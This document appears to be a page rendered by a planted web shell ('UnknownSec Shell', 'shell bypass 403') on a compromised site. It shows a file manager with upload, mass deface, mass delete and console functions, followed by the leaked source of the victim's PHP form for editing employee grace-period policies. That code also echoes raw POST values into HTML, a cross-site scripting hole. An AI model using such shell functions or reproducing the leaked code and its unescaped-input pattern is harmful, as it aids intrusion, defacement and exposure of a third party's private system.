shell bypass 403
UnknownSec Shell
:
/
home
/
delvin
/
secure.delv-in.com
/
views
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
v_usr_grace_edit.php
<?php // form to edit user punch/meal policy $Users = new Users(); $User_Grace_Period = new User_Grace_Period(); date_default_timezone_set($_SESSION['timeZone']); $uRow = $Users->search($_SESSION['PID'], $_SESSION['edit_id'], '', '', '', '', '','', '', '', '', 'lName'); $rows = $User_Grace_Period->search($_SESSION['PID'], $_SESSION['edit_id'], '', '', '', 'effectiveTS DESC'); $yesNoOptions = new Parse_Options_Array('yesNo'); $yesNoArr = $yesNoOptions->get(); $error_start = ''; $error_cxStart = ''; $error_alertStart = ''; $error_end = ''; $error_cxEnd = ''; $error_alertEnd = ''; $error_date = ''; // echo "<pre>"; print_r($uRow); echo "</pre>"; if ($_POST['submitBut'] == 'New'){ $action = 'New'; $shiftStart = ''; $cxShiftStart = ''; $alertShiftStart = ''; $shiftEnd = ''; $cxShiftEnd = ''; $alertShiftEnd = ''; $effective = ''; if (isset($rows[0])){ $minEffectiveTS = $rows[0]['effectiveTS'] + 60*60*24; } else { $minEffectiveTS = $uRow['firstDayTS']; } $xEffectiveTS = ''; } else if ($_POST['submitBut'] == 'Save'){ // send data back from form $effective= $_POST['effective']; $minEffectiveTS = $_POST['minEffectiveTS']; $action = $_POST['action']; if ($_POST['effectiveTS'] == ''){ $error_date = ' err'; } if ($_POST['punch_shift'] == ''){ $error_shift = " err"; } if ($_POST['punch_meal'] == ''){ $error_meal = " err"; } if ($_POST['paid_brk'] == ''){ $error_paid_brk = " err"; } if ($punch_meal == 'yes' && $num_brks == ''){ $error_numBrks = ' err'; } } else { // get data from database $row = $User_Grace_Period->search($_SESSION['PID'],'', '', '',$_POST['usr_graceID'], '`effectiveTS` DESC'); $effective = date('Y-m-d', $row['effectiveTS']); $xEffectiveTS = $row['effectiveTS']; $shiftStart = $row['shiftStart']; $cxShiftStart = $row['cxShiftStart']; $alertShiftStart = $row['alertShiftStart']; $shiftEnd = $row['shiftEnd']; $cxShiftEnd = $row['cxShiftEnd']; $alertShiftEnd = $row['alertShiftEnd']; if (isset($rows[1])){ $minEffectiveTS = $rows[1]['effectiveTS'] + 60*60*24; } else { $minEffectiveTS = $uRow['firstDayTS']; } $action = 'Edit'; } // echo __line__.": effective=" . date('M j, Y', $effectiveTS) . ', prev=' . date('M j, Y', $prevEffectTS) . '<br>'; // echo __line__.": <pre>"; print_r($row); echo "</pre>"; $Pr_Jobs = new Pr_Jobs(); $jRows = $Pr_Jobs->get_4_menu($_SESSION['PID'], '', ''); echo " <div class='tab_box_liner'> <h2>". $action ." Grace Period Policy for " . $uRow['fName']." ". $jRows[$uRow['jobID']] ." </h2> <div class='input_form'> <form action='' method='post' name='edit'> <input type='hidden' name='usr_graceID' value='". $_POST['usr_graceID']."'> <input type='hidden' name='f_empl_status' value='".$_POST['f_empl_status']."'> <input type='hidden' name='f_userID' value='". $_POST['f_userID'] . "'> <input type='hidden' name='f_fName' value='". $_POST['f_fName'] . "'> <input type='hidden' name='f_jobAreaID' value='" . $_POST['f_jobAreaID'] . "'> <input type='hidden' name='f_sort' value='". $_POST['f_sort'] . "'> <input type='hidden' name='xEffectiveTS' value='". $xEffectiveTS . "'> <input type='hidden' name='action' value='". $action ."'> <table class='col-12'> <tr class='form_separator'> <td class='form_input right' colspan=2> <input type='submit' name='submitBut' value='Save' class='btn btn-save'> <input type='submit' name='submitBut' value='Cancel' class='btn btn-cancel'> </td> </tr> <tr class='form_separator'> <td class='form_label'>ID #</td> <td class='form_input'>" . $_POST['usr_graceID'] . "</td> </tr> <tr class='form_separator'> <td class='form_label" . $error_date ."'>Effective date</td> <td class='form_input'> <input type='text' name='effective' id='effective' value='". $effective ."'> </td> </tr> <tr class='form_separator'> <td class='form_input' colspan=2> <h3>Shift-start grace period</h3> </td> </tr> <tr class='form_separator'> <td class='form_label'>Minutes before scheduled start</td> <td class='form_input'> <input type='text' name='shiftStart' value='" . $shiftStart . "' class='w100px'> </td> </tr> <tr class='form_separator'> <td class='form_label w250px'>Correct Punch¹</td> <td class='form_input'> <div class='colAuto'> <label class='ckbx pad_ckbx'> <input type='checkbox' name='cxShiftStart' value='yes'"; if ($cxShiftStart == 'yes'){ echo " checked"; } echo "> <span class='checkbox'></span> </label> </div> </td> </tr> <tr class='form_separator'> <td class='form_label'>Create Alert²</td> <td class='form_input'> <div class='colAuto'> <label class='ckbx pad_ckbx'> <input type='checkbox' name='alertShiftStart' value='yes'"; if ($alertShiftStart == 'yes'){ echo " checked"; } echo "> <span class='checkbox'></span> </label> </div> </td> </tr> <tr class='form_separator'> <td class='form_input' colspan=2> <h3>Shift-end grace period</h3> </td> </tr> <tr class='form_separator'> <td class='form_label'>Minutes after scheduled finish</td> <td class='form_input'> <input type='text' name='shiftEnd' value='" . $shiftEnd . "' class='w100px'> </td> </tr> <tr class='form_separator'> <td class='form_label'>Correct Punch¹</td> <td class='form_input'> <div class='colAuto'> <label class='ckbx pad_ckbx'> <input type='checkbox' name='cxShiftEnd' value='yes'"; if ($cxShiftEnd == 'yes'){ echo " checked"; } echo "> <span class='checkbox'></span> </label> </div> </td> </tr> <tr> <td class='form_label'>Create Alert²</td> <td class='form_input'> <div class='colAuto'> <label class='ckbx pad_ckbx'> <input type='checkbox' name='alertShiftEnd' value='yes'"; if ($alertShiftEnd == 'yes'){ echo " checked"; } echo "> <span class='checkbox'></span> </label> </div> </td> </tr> </table> </form> </div> </div>"; ?> <script language="javascript"> flatpickr("#effective", { altInput: true, altFormat: "F j, Y", dateFormat: "Y-m-d", minDate: '<?php echo date('Y-m-d', $minEffectiveTS); ?>' }); </script>
© 2026 UnknownSec